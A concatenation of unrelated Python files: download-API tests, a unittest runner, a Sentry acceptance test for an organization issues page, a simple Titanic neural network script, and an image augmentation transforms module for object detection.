@mock.patch('webservices.resources.download.get_cached_file')
@mock.patch('webservices.resources.download.download.export_query')
def test_download(self, export, get_cached):
get_cached.return_value = None
res = self.client.post_json(api.url_for(resource.DownloadView, path='candidates', office='S'))
assert res.json == {'status': 'queued'}
get_cached.assert_called_once_with('/v1/candidates/', b'office=S', filename=None)
export.delay.assert_called_once_with('/v1/candidates/', b'office=S')
@mock.patch('webservices.resources.download.get_cached_file')
@mock.patch('webservices.resources.download.download.export_query')
def test_download_cached(self, export, get_cached):
get_cached.return_value = '/download'
res = self.client.post_json(api.url_for(resource.DownloadView, path='candidates', office='S'))
assert res.json == {'status': 'complete', 'url': '/download'}
assert not export.delay.called
def test_download_forbidden(self):
with pytest.raises(ValueError):
self.client.post_json(api.url_for(resource.DownloadView, path='elections'))
@mock.patch('webservices.resources.download.MAX_RECORDS', 2)
@mock.patch('webservices.resources.download.get_cached_file')
@mock.patch('webservices.resources.download.download.export_query')
def test_download_too_big(self, export, get_cached):
get_cached.return_value = None
[factories.CandidateFactory() for _ in range(5)]
db.session.commit()
res = self.client.post_json(
api.url_for(resource.DownloadView, path='candidates'),
expect_errors=True,
)
assert res.status_code == 403
assert not export.delay.called
@mock.patch('webservices.resources.download.get_download_url')
@mock.patch('webservices.tasks.utils.get_object')
def test_get_cached_exists(self, get_object, get_download):
mock_object = mock.Mock()
get_object.return_value = mock_object
get_download.return_value = '/download'
res = resource.get_cached_file('/candidate', b'', filename='download.csv')
assert res == '/download'
get_download.assert_called_once_with(mock_object, filename='download.csv')
@mock.patch('webservices.tasks.utils.get_object')
def test_get_cached_not_exists(self, get_object):
mock_object = mock.Mock()
def get_metadata():
raise ClientError({'Error': {}}, 'test')
mock_metadata = mock.PropertyMock(side_effect=get_metadata)
type(mock_object).metadata = mock_metadata
get_object.return_value = mock_object
res = resource.get_cached_file('/candidate', b'')
assert res is None
|
"""
Run all the unit tests in the cea/tests folder
"""
import os
import unittest
import cea.config
import cea.workflows.workflow
__author__ = "Daren Thomas"
__copyright__ = "Copyright 2020, Architecture and Building Systems - ETH Zurich"
__credits__ = ["Daren Thomas"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Daren Thomas"
__email__ = "cea@arch.ethz.ch"
__status__ = "Production"
def main(_):
test_suite = unittest.defaultTestLoader.discover(os.path.dirname(__file__))
result = unittest.TextTestRunner(verbosity=1).run(test_suite)
if not result.wasSuccessful():
raise AssertionError("Unittests failed.")
if __name__ == "__main__":
main(cea.config.Configuration)
|
from __future__ import absolute_import
import pytz
from datetime import datetime, timedelta
from django.utils import timezone
from sentry.testutils import AcceptanceTestCase, SnubaTestCase
from mock import patch
event_time = (datetime.utcnow() - timedelta(days=3)).replace(tzinfo=pytz.utc)
class OrganizationGroupIndexTest(AcceptanceTestCase, SnubaTestCase):
def setUp(self):
super(OrganizationGroupIndexTest, self).setUp()
self.user = self.create_user('foo@example.com')
self.org = self.create_organization(owner=self.user, name='Rowdy Tiger')
self.team = self.create_team(
organization=self.org,
name='Mariachi Band',
members=[self.user])
self.project = self.create_project(
organization=self.org,
teams=[self.team],
name='Bengal',
)
self.other_project = self.create_project(
organization=self.org,
teams=[self.team],
name='Sumatra',
)
self.login_as(self.user)
self.path = u'/organizations/{}/issues/'.format(self.org.slug)
def test_with_onboarding(self):
self.project.update(first_event=None)
self.browser.get(self.path)
self.wait_until_loaded()
self.browser.wait_until_test_id('awaiting-events')
self.browser.snapshot('organization issues onboarding')
def test_with_no_results(self):
self.project.update(first_event=timezone.now())
self.browser.get(self.path)
self.wait_until_loaded()
self.browser.wait_until_test_id('empty-state')
self.browser.snapshot('organization issues no results')
@patch('django.utils.timezone.now')
def test_with_results(self, mock_now):
mock_now.return_value = datetime.utcnow().replace(tzinfo=pytz.utc)
self.store_event(
data={
'event_id': 'a' * 32,
'message': 'oh no',
'timestamp': event_time.isoformat()[:19],
'fingerprint': ['group-1']
},
project_id=self.project.id
)
self.store_event(
data={
'event_id': 'b' * 32,
'message': 'oh snap',
'timestamp': event_time.isoformat()[:19],
'fingerprint': ['group-2']
},
project_id=self.project.id
)
self.browser.get(self.path)
self.wait_until_loaded()
self.browser.wait_until('.event-issue-header')
self.browser.snapshot('organization issues with issues')
groups = self.browser.find_elements_by_class_name('event-issue-header')
assert len(groups) == 2
assert 'oh snap' in groups[0].text
assert 'oh no' in groups[1].text
def wait_until_loaded(self):
self.browser.wait_until_not('.loading')
|
from DataPreparation import DataPreparation
import numpy as np
from scipy.special import expit
class ANN:
def __init__(self):
self.neuralNetwork = NeuralNetwork()
def trainNetwork(self, numberOfIteration):
dataPreparation = DataPreparation()
# testData = dataPreparation.prepareTestData()
trainData = dataPreparation.prepareTrainData()
trainingInputs = trainData.drop("Survived", axis=1).to_numpy(int)
trainingOutputs = trainData["Survived"].to_numpy(int)
trainingOutputs = trainingOutputs.reshape(1, trainingOutputs.size).T
trainingInputs = np.array(trainingInputs, dtype=np.float128)
trainingOutputs = np.array(trainingOutputs, dtype=np.float128)
# print(trainingInputs)
# print(trainingOutputs)
self.neuralNetwork.train(trainingInputs, trainingOutputs, numberOfIteration)
def accuracy(self):
dataPreparation = DataPreparation()
testData = dataPreparation.prepareTestData().to_numpy(int)
testOutput = dataPreparation.prepareSubmissionData().to_numpy(int)
testOutput = testOutput.reshape(testOutput.size, 1)
# print(testData)
# print(testOutput)
calculated = self.neuralNetwork.think(testData)
accuracy = (testOutput.size - np.sum(np.abs(testOutput - calculated)))/testOutput.size
accuracy = accuracy * 10000
accuracy = np.array(accuracy, dtype=int)
accuracy = accuracy/100
return accuracy
#
# def accuracy(self, testInput, testOutput):
# calculated = self.neuralNetwork.think(testInput)
# calculated = self.neuralNetwork.think(testInput)
# # return np.sum(accuracy)
class NeuralNetwork():
def __init__(self):
# Seed the random number generator
np.random.seed(1)
# Set synaptic weights to a 3x1 matrix,
# with values from -1 to 1 and mean 0
self.synaptic_weights = 2 * np.random.random((7, 1)) - 1
def sigmoid(self, x):
"""
Takes in weighted sum of the inputs and normalizes
them through between 0 and 1 through a sigmoid function
"""
# return 1 / (1 + np.exp(-x))
return expit(x)
def sigmoid_derivative(self, x):
"""
The derivative of the sigmoid function used to
calculate necessary weight adjustments
"""
return x * (1 - x)
def train(self, training_inputs, training_outputs, training_iterations):
# print('testy')
# print(self.synaptic_weights.shape)
# print(training_inputs.shape)
# print(training_outputs.reshape(training_outputs.size, 1))
"""
We train the model through trial and error, adjusting the
synaptic weights each time to get a better result
"""
for iteration in range(training_iterations):
# print(iteration)
# Pass training set through the neural network
output = self.think(training_inputs)
# Calculate the error rate
error = training_outputs - output
# Multiply error by input and gradient of the sigmoid function
# Less confident weights are adjusted more through the nature of the function
adjustments = np.dot(training_inputs.T, error * self.sigmoid_derivative(output))
# Adjust synaptic weights
self.synaptic_weights += adjustments
def think(self, inputs):
"""
Pass inputs through the neural network to get output
"""
inputs = inputs.astype(float)
output = self.sigmoid(np.dot(inputs, self.synaptic_weights))
return output
if __name__ == "__main__":
ann = ANN()
# ann.trainNetwork(10000)
ann.trainNetwork(10000)
ann.accuracy()
# print('wynikkk')
print(ann.neuralNetwork.think(np.array([1, 3, 0, 22, 1, 0, 7])))
print(ann.neuralNetwork.think(np.array([2, 1, 1, 38, 1, 0, 71])))
print(ann.neuralNetwork.think(np.array([3, 3, 1, 26, 0, 0, 7])))
# ann.calculateAccuracy()
# print(ann.calculateAccuracy())
# if __name__ == "__main__":
# # Initialize the single neuron neural network
# neural_network = NeuralNetwork()
#
# print("Random starting synaptic weights: ")
# print(neural_network.synaptic_weights)
#
# # The training set, with 4 examples consisting of 3
# # input values and 1 output value
# training_inputs = np.array([[0, 0, 1],
# [1, 1, 1],
# [1, 0, 1],
# [0, 1, 1]])
# # dataPreparation = DataPreparation()
# # trainingInput = dataPreparation.prepareTrainData()
#
# training_outputs = np.array([[0, 1, 1, 0]]).T
#
# # Train the neural network
# neural_network.train(training_inputs, training_outputs, 10000)
#
# print("Synaptic weights after training: ")
# print(neural_network.synaptic_weights)
#
# A = str(input("Input 1: "))
# B = str(input("Input 2: "))
# C = str(input("Input 3: "))
#
# print("New situation: input data = ", A, B, C)
# print("Output data: ")
# print(neural_network.think(np.array([A, B, C])))
|
# -*- coding: utf-8 -*-
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# File: transform.py
import inspect
import pprint
from typing import Callable, List, TypeVar
from fvcore.transforms.transform import Transform
from fvcore.transforms.transform_util import to_float_tensor, to_numpy
import numpy as np
import random
import torch
import torch.nn.functional as F
from PIL import Image, ImageOps, ImageFilter
from detectron2.data.detection_utils import fill_region, compute_crop_box_iou
try:
import cv2 # noqa
except ImportError:
# OpenCV is an optional dependency at the moment
pass
__all__ = [
"ExtentTransform",
"ResizeTransform",
"RotationTransform",
"ColorTransform",
"PILColorTransform",
"CropTransform",
"BlendTransform",
"VFlipTransform",
"HFlipTransform",
"NoOpTransform",
"TransformList",
"ScaleTransform",
"GridSampleTransform",
"EdgeFilterTransform",
"BoxShearTransform",
"BoxContrastTransform",
"NoiseTransform",
"BoxEraseTransform",
"MosaicTransform",
"BoxMoveTransform",
]
class WrapTransform(Transform):
"""Re-implement the Transform class, because it is a python pack, I can't add new func to it.
Just add some custom func to Transform, and all the child transform classes will be a subclass of this
"""
def apply_annotations(self, annotations):
"""
For most transform methods, num of annos won't be changed, only the box coor will change.
Thus, if num of annos changes, re-write this func.
"""
boxes = np.array([anno["bbox"] for anno in annotations])
boxes = self.apply_box(boxes).tolist()
for i,box in enumerate(boxes):
annotations[i]["bbox"] = box
annotations = [annotations[i] for i,anno in enumerate(annotations) if (int(anno["bbox"][0])<int(anno["bbox"][2]) and int(anno["bbox"][1])<int(anno["bbox"][3]))]
return annotations
_T = TypeVar("_T")
# pyre-ignore-all-errors
class TransformList(WrapTransform):
"""
Maintain a list of transform operations which will be applied in sequence.
Attributes:
transforms (list[Transform])
"""
def __init__(self, transforms: List[Transform]):
"""
Args:
transforms (list[Transform]): list of transforms to perform.
"""
super().__init__()
# "Flatten" the list so that TransformList do not recursively contain TransfomList.
# The additional hierarchy does not change semantic of the class, but cause extra
# complexities in e.g, telling whether a TransformList contains certain Transform
tfms_flatten = []
for t in transforms:
assert isinstance(
t, Transform
), f"TransformList requires a list of Transform. Got type {type(t)}!"
if isinstance(t, TransformList):
tfms_flatten.extend(t.transforms)
else:
tfms_flatten.append(t)
self.transforms = tfms_flatten
def _apply(self, x: _T, meth: str) -> _T:
"""
Apply the transforms on the input.
Args:
x: input to apply the transform operations.
meth (str): meth.
Returns:
x: after apply the transformation.
"""
for t in self.transforms:
x = getattr(t, meth)(x)
return x
def __getattribute__(self, name: str):
# use __getattribute__ to win priority over any registered dtypes
if name.startswith("apply_"):
return lambda x: self._apply(x, name)
return super().__getattribute__(name)
def __add__(self, other: "TransformList") -> "TransformList":
"""
Args:
other (TransformList): transformation to add.
Returns:
TransformList: list of transforms.
"""
others = other.transforms if isinstance(other, TransformList) else [other]
return TransformList(self.transforms + others)
def __iadd__(self, other: "TransformList") -> "TransformList":
"""
Args:
other (TransformList): transformation to add.
Returns:
TransformList: list of transforms.
"""
others = other.transforms if isinstance(other, TransformList) else [other]
self.transforms.extend(others)
return self
def __radd__(self, other: "TransformList") -> "TransformList":
"""
Args:
other (TransformList): transformation to add.
Returns:
TransformList: list of transforms.
"""
others = other.transforms if isinstance(other, TransformList) else [other]
return TransformList(others + self.transforms)
def __len__(self) -> int:
"""
Returns:
Number of transforms contained in the TransformList.
"""
return len(self.transforms)
def __getitem__(self, idx) -> Transform:
return self.transforms[idx]
def inverse(self) -> "TransformList":
"""
Invert each transform in reversed order.
"""
return TransformList([x.inverse() for x in self.transforms[::-1]])
def __repr__(self) -> str:
msgs = [str(t) for t in self.transforms]
return "TransformList[{}]".format(", ".join(msgs))
__str__ = __repr__
# The actual implementations are provided in __getattribute__.
# But abstract methods need to be declared here.
def apply_coords(self, x):
raise NotImplementedError
def apply_image(self, x):
raise NotImplementedError
class HFlipTransform(WrapTransform):
"""
Perform horizontal flip.
"""
def __init__(self, width: int):
super().__init__()
self._set_attributes(locals())
def apply_image(self, img: np.ndarray) -> np.ndarray:
"""
Flip the image(s).
Args:
img (ndarray): of shape HxW, HxWxC, or NxHxWxC. The array can be
of type uint8 in range [0, 255], or floating point in range
[0, 1] or [0, 255].
Returns:
ndarray: the flipped image(s).
"""
# NOTE: opencv would be faster:
# https://github.com/pytorch/pytorch/issues/16424#issuecomment-580695672
if img.ndim <= 3: # HxW, HxWxC
return np.flip(img, axis=1)
else:
return np.flip(img, axis=-2)
def apply_coords(self, coords: np.ndarray) -> np.ndarray:
"""
Flip the coordinates.
Args:
coords (ndarray): floating point array of shape Nx2. Each row is
(x, y).
Returns:
ndarray: the flipped coordinates.
Note:
The inputs are floating point coordinates, not pixel indices.
Therefore they are flipped by `(W - x, H - y)`, not
`(W - 1 - x, H - 1 - y)`.
"""
coords[:, 0] = self.width - coords[:, 0]
return coords
def inverse(self) -> Transform:
"""
The inverse is to flip again
"""
return self
class VFlipTransform(WrapTransform):
"""
Perform vertical flip.
"""
def __init__(self, height: int):
super().__init__()
self._set_attributes(locals())
def apply_image(self, img: np.ndarray) -> np.ndarray:
"""
Flip the image(s).
Args:
img (ndarray): of shape HxW, HxWxC, or NxHxWxC. The array can be
of type uint8 in range [0, 255], or floating point in range
[0, 1] or [0, 255].
Returns:
ndarray: the flipped image(s).
"""
tensor = torch.from_numpy(np.ascontiguousarray(img))
if len(tensor.shape) == 2:
# For dimension of HxW.
tensor = tensor.flip((-2))
elif len(tensor.shape) > 2:
# For dimension of HxWxC, NxHxWxC.
tensor = tensor.flip((-3))
return tensor.numpy()
def apply_coords(self, coords: np.ndarray) -> np.ndarray:
"""
Flip the coordinates.
Args:
coords (ndarray): floating point array of shape Nx2. Each row is
(x, y).
Returns:
ndarray: the flipped coordinates.
Note:
The inputs are floating point coordinates, not pixel indices.
Therefore they are flipped by `(W - x, H - y)`, not
`(W - 1 - x, H - 1 - y)`.
"""
coords[:, 1] = self.height - coords[:, 1]
return coords
def inverse(self) -> Transform:
"""
The inverse is to flip again
"""
return self
class NoOpTransform(WrapTransform):
"""
A transform that does nothing.
"""
def __init__(self):
super().__init__()
def apply_image(self, img: np.ndarray) -> np.ndarray:
return img
def apply_coords(self, coords: np.ndarray) -> np.ndarray:
return coords
def inverse(self) -> Transform:
return self
def __getattr__(self, name: str):
if name.startswith("apply_"):
return lambda x: x
raise AttributeError("NoOpTransform object has no attribute {}".format(name))
class ScaleTransform(WrapTransform):
"""
Resize the image to a target size.
"""
def __init__(self, h: int, w: int, new_h: int, new_w: int, interp: str = None):
"""
Args:
h, w (int): original image size.
new_h, new_w (int): new image size.
interp (str): interpolation methods. Options includes `nearest`, `linear`
(3D-only), `bilinear`, `bicubic` (4D-only), and `area`.
Details can be found in:
https://pytorch.org/docs/stable/nn.functional.html
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img: np.ndarray, interp: str = None) -> np.ndarray:
"""
Resize the image(s).
Args:
img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be
of type uint8 in range [0, 255], or floating point in range
[0, 1] or [0, 255].
interp (str): interpolation methods. Options includes `nearest`, `linear`
(3D-only), `bilinear`, `bicubic` (4D-only), and `area`.
Details can be found in:
https://pytorch.org/docs/stable/nn.functional.html
Returns:
ndarray: resized image(s).
"""
if len(img.shape) == 4:
h, w = img.shape[1:3]
elif len(img.shape) in (2, 3):
h, w = img.shape[:2]
else:
raise ("Unsupported input with shape of {}".format(img.shape))
assert (
self.h == h and self.w == w
), "Input size mismatch h w {}:{} -> {}:{}".format(self.h, self.w, h, w)
interp_method = interp if interp is not None else self.interp
# Option of align_corners is only supported for linear, bilinear,
# and bicubic.
if interp_method in ["linear", "bilinear", "bicubic"]:
align_corners = False
else:
align_corners = None
# note: this is quite slow for int8 images because torch does not
# support it https://github.com/pytorch/pytorch/issues/5580
float_tensor = torch.nn.functional.interpolate(
to_float_tensor(img),
size=(self.new_h, self.new_w),
mode=interp_method,
align_corners=align_corners,
)
return to_numpy(float_tensor, img.shape, img.dtype)
def apply_coords(self, coords: np.ndarray) -> np.ndarray:
"""
Compute the coordinates after resize.
Args:
coords (ndarray): floating point array of shape Nx2. Each row is
(x, y).
Returns:
ndarray: resized coordinates.
"""
coords[:, 0] = coords[:, 0] * (self.new_w * 1.0 / self.w)
coords[:, 1] = coords[:, 1] * (self.new_h * 1.0 / self.h)
return coords
def apply_segmentation(self, segmentation: np.ndarray) -> np.ndarray:
"""
Apply resize on the full-image segmentation.
Args:
segmentation (ndarray): of shape HxW. The array should have integer
or bool dtype.
Returns:
ndarray: resized segmentation.
"""
segmentation = self.apply_image(segmentation, interp="nearest")
return segmentation
def inverse(self) -> Transform:
"""
The inverse is to resize it back.
"""
return ScaleTransform(self.new_h, self.new_w, self.h, self.w, self.interp)
class GridSampleTransform(WrapTransform):
def __init__(self, grid: np.ndarray, interp: str):
"""
Args:
grid (ndarray): grid has x and y input pixel locations which are
used to compute output. Grid has values in the range of [-1, 1],
which is normalized by the input height and width. The dimension
is `N x H x W x 2`.
interp (str): interpolation methods. Options include `nearest` and
`bilinear`.
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img: np.ndarray, interp: str = None) -> np.ndarray:
"""
Apply grid sampling on the image(s).
Args:
img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be
of type uint8 in range [0, 255], or floating point in range
[0, 1] or [0, 255].
interp (str): interpolation methods. Options include `nearest` and
`bilinear`.
Returns:
ndarray: grid sampled image(s).
"""
interp_method = interp if interp is not None else self.interp
float_tensor = torch.nn.functional.grid_sample(
to_float_tensor(img), # NxHxWxC -> NxCxHxW.
torch.from_numpy(self.grid),
mode=interp_method,
padding_mode="border",
align_corners=False,
)
return to_numpy(float_tensor, img.shape, img.dtype)
def apply_coords(self, coords: np.ndarray):
"""
Not supported.
"""
raise NotImplementedError()
def apply_segmentation(self, segmentation: np.ndarray) -> np.ndarray:
"""
Apply grid sampling on the full-image segmentation.
Args:
segmentation (ndarray): of shape HxW. The array should have integer
or bool dtype.
Returns:
ndarray: grid sampled segmentation.
"""
segmentation = self.apply_image(segmentation, interp="nearest")
return segmentation
class CropTransform(WrapTransform):
def __init__(self, x0: int, y0: int, w: int, h: int, min_area_rate: float):
# TODO: flip the order of w and h.
"""
Args:
x0, y0, w, h (int): crop the image(s) by img[y0:y0+h, x0:x0+w].
min_area_rate: a box after crop, if area/raw_aera<min_area_rate, remove this area.
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img: np.ndarray) -> np.ndarray:
"""
Crop the image(s).
Args:
img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be
of type uint8 in range [0, 255], or floating point in range
[0, 1] or [0, 255].
Returns:
ndarray: cropped image(s).
"""
if len(img.shape) <= 3:
return img[self.y0 : self.y0 + self.h, self.x0 : self.x0 + self.w]
else:
return img[..., self.y0 : self.y0 + self.h, self.x0 : self.x0 + self.w, :]
def apply_coords(self, coords: np.ndarray) -> np.ndarray:
"""
Apply crop transform on coordinates.
Args:
coords (ndarray): floating point array of shape Nx2. Each row is
(x, y).
Returns:
ndarray: cropped coordinates.
"""
coords[:, 0] -= self.x0
coords[:, 1] -= self.y0
return coords
def apply_annotations(self, annotations):
#raw box area
boxes = np.array([anno["bbox"] for anno in annotations])
raw_area = (boxes[:,2]-boxes[:,0]) * (boxes[:,3]-boxes[:,1])
if boxes.ndim == 1:
boxes = boxes.reshape(-1, 4)
#compute iou mask
crop_box = np.array([self.x0, self.y0, self.x0+self.w, self.y0+self.h])
iou = compute_crop_box_iou(boxes, crop_box)
mask = iou > 0
boxes = boxes[mask]
raw_area = raw_area[mask]
#remove some annos
annotations = [annotations[i] for i in range(len(annotations)) if mask[i]]
#for iou>0, compute inter boxes
crop_box = np.tile(crop_box, (boxes.shape[0], 1))
inter_boxes = np.zeros_like(boxes)
inter_boxes[:,0] = np.maximum(boxes[:,0], crop_box[:,0])
inter_boxes[:,1] = np.maximum(boxes[:,1], crop_box[:,1])
inter_boxes[:,2] = np.minimum(boxes[:,2], crop_box[:,2])
inter_boxes[:,3] = np.minimum(boxes[:,3], crop_box[:,3])
#cvt inter boxes' coors to crop img
inter_boxes[:,0] = inter_boxes[:,0] - crop_box[:,0]
inter_boxes[:,1] = inter_boxes[:,1] - crop_box[:,1]
inter_boxes[:,2] = inter_boxes[:,2] - crop_box[:,0]
inter_boxes[:,3] = inter_boxes[:,3] - crop_box[:,1]
#box area on crop img
new_area = (inter_boxes[:,2]-inter_boxes[:,0]) * (inter_boxes[:,3]-inter_boxes[:,1])
crop_box_area = self.w * self.h
mask = (new_area/raw_area > self.min_area_rate) & (abs(new_area - crop_box_area) > 5)
#find boxes whose new_area==crop_box_area
area_idx = []
for i, area in enumerate(new_area):
if abs(area - crop_box_area) < 0.01:
area_idx.append(i)
#only retain the smallest one
smallest = 10000000
smallest_idx = -1
for idx in area_idx:
if smallest > raw_area[idx]:
smallest = raw_area[idx]
smallest_idx = idx
for idx in area_idx:
if not idx==smallest_idx:
mask[idx] = False
inter_boxes = inter_boxes[mask]
#remove some annos
annotations = [annotations[i] for i in range(len(annotations)) if mask[i]]
#update coor
for i in range(len(annotations)):
annotations[i]["bbox"] = inter_boxes[i]
return annotations
def apply_polygons(self, polygons: list) -> list:
"""
Apply crop transform on a list of polygons, each represented by a Nx2 array.
It will crop the polygon with the box, therefore the number of points in the
polygon might change.
Args:
polygon (list[ndarray]): each is a Nx2 floating point array of
(x, y) format in absolute coordinates.
Returns:
ndarray: cropped polygons.
"""
import shapely.geometry as geometry
# Create a window that will be used to crop
crop_box = geometry.box(
self.x0, self.y0, self.x0 + self.w, self.y0 + self.h
).buffer(0.0)
cropped_polygons = []
for polygon in polygons:
polygon = geometry.Polygon(polygon).buffer(0.0)
# polygon must be valid to perform intersection.
assert polygon.is_valid, polygon
cropped = polygon.intersection(crop_box)
if cropped.is_empty:
continue
if not isinstance(cropped, geometry.collection.BaseMultipartGeometry):
cropped = [cropped]
# one polygon may be cropped to multiple ones
for poly in cropped:
# It could produce lower dimensional objects like lines or
# points, which we want to ignore
if not isinstance(poly, geometry.Polygon) or not poly.is_valid:
continue
coords = np.asarray(poly.exterior.coords)
# NOTE This process will produce an extra identical vertex at
# the end. So we remove it. This is tested by
# `tests/test_data_transform.py`
cropped_polygons.append(coords[:-1])
return [self.apply_coords(p) for p in cropped_polygons]
class BlendTransform(WrapTransform):
"""
Transforms pixel colors with PIL enhance functions.
"""
def __init__(self, src_image: np.ndarray, src_weight: float, dst_weight: float):
"""
Blends the input image (dst_image) with the src_image using formula:
``src_weight * src_image + dst_weight * dst_image``
Args:
src_image (ndarray): Input image is blended with this image
src_weight (float): Blend weighting of src_image
dst_weight (float): Blend weighting of dst_image
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img: np.ndarray, interp: str = None) -> np.ndarray:
"""
Apply blend transform on the image(s).
Args:
img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be
of type uint8 in range [0, 255], or floating point in range
[0, 1] or [0, 255].
interp (str): keep this option for consistency, perform blend would not
require interpolation.
Returns:
ndarray: blended image(s).
"""
if img.dtype == np.uint8:
img = img.astype(np.float32)
img = self.src_weight * self.src_image + self.dst_weight * img
return np.clip(img, 0, 255).astype(np.uint8)
else:
return self.src_weight * self.src_image + self.dst_weight * img
def apply_coords(self, coords: np.ndarray) -> np.ndarray:
"""
Apply no transform on the coordinates.
"""
return coords
def apply_segmentation(self, segmentation: np.ndarray) -> np.ndarray:
"""
Apply no transform on the full-image segmentation.
"""
return segmentation
def inverse(self) -> Transform:
"""
The inverse is a no-op.
"""
return NoOpTransform()
class ExtentTransform(WrapTransform):
"""
Extracts a subregion from the source image and scales it to the output size.
The fill color is used to map pixels from the source rect that fall outside
the source image.
See: https://pillow.readthedocs.io/en/latest/PIL.html#PIL.ImageTransform.ExtentTransform
"""
def __init__(self, src_rect, output_size, interp=Image.LINEAR, fill=0):
"""
Args:
src_rect (x0, y0, x1, y1): src coordinates
output_size (h, w): dst image size
interp: PIL interpolation methods
fill: Fill color used when src_rect extends outside image
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img, interp=None):
h, w = self.output_size
ret = Image.fromarray(img).transform(
size=(w, h),
method=Image.EXTENT,
data=self.src_rect,
resample=interp if interp else self.interp,
fill=self.fill,
)
return np.asarray(ret)
def apply_coords(self, coords):
# Transform image center from source coordinates into output coordinates
# and then map the new origin to the corner of the output image.
h, w = self.output_size
x0, y0, x1, y1 = self.src_rect
new_coords = coords.astype(np.float32)
new_coords[:, 0] -= 0.5 * (x0 + x1)
new_coords[:, 1] -= 0.5 * (y0 + y1)
new_coords[:, 0] *= w / (x1 - x0)
new_coords[:, 1] *= h / (y1 - y0)
new_coords[:, 0] += 0.5 * w
new_coords[:, 1] += 0.5 * h
return new_coords
def apply_segmentation(self, segmentation):
segmentation = self.apply_image(segmentation, interp=Image.NEAREST)
return segmentation
class ResizeTransform(WrapTransform):
"""
Resize the image to a target size.
"""
def __init__(self, h, w, new_h, new_w, interp=None):
"""
Args:
h, w (int): original image size
new_h, new_w (int): new image size
interp: PIL interpolation methods, defaults to bilinear.
"""
# TODO decide on PIL vs opencv
super().__init__()
if interp is None:
interp = Image.BILINEAR
self._set_attributes(locals())
def apply_image(self, img, interp=None):
assert img.shape[:2] == (self.h, self.w)
assert len(img.shape) <= 4
if img.dtype == np.uint8:
pil_image = Image.fromarray(img)
interp_method = interp if interp is not None else self.interp
pil_image = pil_image.resize((self.new_w, self.new_h), interp_method)
ret = np.asarray(pil_image)
else:
# PIL only supports uint8
if any(x < 0 for x in img.strides):
img = np.ascontiguousarray(img)
img = torch.from_numpy(img)
shape = list(img.shape)
shape_4d = shape[:2] + [1] * (4 - len(shape)) + shape[2:]
img = img.view(shape_4d).permute(2, 3, 0, 1) # hw(c) -> nchw
_PIL_RESIZE_TO_INTERPOLATE_MODE = {Image.BILINEAR: "bilinear", Image.BICUBIC: "bicubic"}
mode = _PIL_RESIZE_TO_INTERPOLATE_MODE[self.interp]
img = F.interpolate(img, (self.new_h, self.new_w), mode=mode, align_corners=False)
shape[:2] = (self.new_h, self.new_w)
ret = img.permute(2, 3, 0, 1).view(shape).numpy() # nchw -> hw(c)
return ret
def apply_coords(self, coords):
coords[:, 0] = coords[:, 0] * (self.new_w * 1.0 / self.w)
coords[:, 1] = coords[:, 1] * (self.new_h * 1.0 / self.h)
return coords
def apply_segmentation(self, segmentation):
segmentation = self.apply_image(segmentation, interp=Image.NEAREST)
return segmentation
def inverse(self):
return ResizeTransform(self.new_h, self.new_w, self.h, self.w, self.interp)
class RotationTransform(WrapTransform):
"""
This method returns a copy of this image, rotated the given
number of degrees counter clockwise around its center.
"""
def __init__(self, h, w, angle, expand=True, center=None, interp=None):
"""
Args:
h, w (int): original image size
angle (float): degrees for rotation
expand (bool): choose if the image should be resized to fit the whole
rotated image (default), or simply cropped
center (tuple (width, height)): coordinates of the rotation center
if left to None, the center will be fit to the center of each image
center has no effect if expand=True because it only affects shifting
interp: cv2 interpolation method, default cv2.INTER_LINEAR
"""
super().__init__()
image_center = np.array((w / 2, h / 2))
if center is None:
center = image_center
if interp is None:
interp = cv2.INTER_LINEAR
abs_cos, abs_sin = (abs(np.cos(np.deg2rad(angle))), abs(np.sin(np.deg2rad(angle))))
if expand:
# find the new width and height bounds
bound_w, bound_h = np.rint(
[h * abs_sin + w * abs_cos, h * abs_cos + w * abs_sin]
).astype(int)
else:
bound_w, bound_h = w, h
self._set_attributes(locals())
self.rm_coords = self.create_rotation_matrix()
# Needed because of this problem https://github.com/opencv/opencv/issues/11784
self.rm_image = self.create_rotation_matrix(offset=-0.5)
def apply_image(self, img, interp=None):
"""
img should be a numpy array, formatted as Height * Width * Nchannels
"""
if len(img) == 0 or self.angle % 360 == 0:
return img
assert img.shape[:2] == (self.h, self.w)
interp = interp if interp is not None else self.interp
return cv2.warpAffine(img, self.rm_image, (self.bound_w, self.bound_h), flags=interp)
def apply_coords(self, coords):
"""
coords should be a N * 2 array-like, containing N couples of (x, y) points
"""
coords = np.asarray(coords, dtype=float)
if len(coords) == 0 or self.angle % 360 == 0:
return coords
return cv2.transform(coords[:, np.newaxis, :], self.rm_coords)[:, 0, :]
def apply_segmentation(self, segmentation):
segmentation = self.apply_image(segmentation, interp=cv2.INTER_NEAREST)
return segmentation
def create_rotation_matrix(self, offset=0):
center = (self.center[0] + offset, self.center[1] + offset)
rm = cv2.getRotationMatrix2D(tuple(center), self.angle, 1)
if self.expand:
# Find the coordinates of the center of rotation in the new image
# The only point for which we know the future coordinates is the center of the image
rot_im_center = cv2.transform(self.image_center[None, None, :] + offset, rm)[0, 0, :]
new_center = np.array([self.bound_w / 2, self.bound_h / 2]) + offset - rot_im_center
# shift the rotation center to the new coordinates
rm[:, 2] += new_center
return rm
def inverse(self):
"""
The inverse is to rotate it back with expand, and crop to get the original shape.
"""
if not self.expand: # Not possible to inverse if a part of the image is lost
raise NotImplementedError()
rotation = RotationTransform(
self.bound_h, self.bound_w, -self.angle, True, None, self.interp
)
crop = CropTransform(
(rotation.bound_w - self.w) // 2, (rotation.bound_h - self.h) // 2, self.w, self.h
)
return TransformList([rotation, crop])
class ColorTransform(WrapTransform):
"""
Generic wrapper for any photometric transforms.
These transformations should only affect the color space and
not the coordinate space of the image (e.g. annotation
coordinates such as bounding boxes should not be changed)
"""
def __init__(self, op):
"""
Args:
op (Callable): operation to be applied to the image,
which takes in an ndarray and returns an ndarray.
"""
if not callable(op):
raise ValueError("op parameter should be callable")
super().__init__()
self._set_attributes(locals())
def apply_image(self, img):
return self.op(img)
